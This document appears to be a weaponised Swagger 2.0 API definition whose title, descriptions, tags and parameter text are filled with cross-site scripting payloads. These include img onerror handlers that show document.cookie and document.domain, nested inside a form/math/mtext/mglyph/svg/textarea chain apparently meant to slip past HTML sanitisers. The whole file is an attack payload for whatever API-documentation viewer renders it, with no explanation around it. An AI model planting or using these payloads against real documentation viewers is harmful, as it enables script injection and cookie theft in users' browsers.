swagger: '2.0'
info:
  title: <img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)>
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>">"><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /SYARIF07:
    get:
      responses:
        '200':
          description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
      tags:
        - SYARIF07_XSS_D<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x onerror=alert(document.domain)><img src=x onerror=alert(document.cookie)><img onerror=alert(1) src=javascript:alert(1);>"></form>
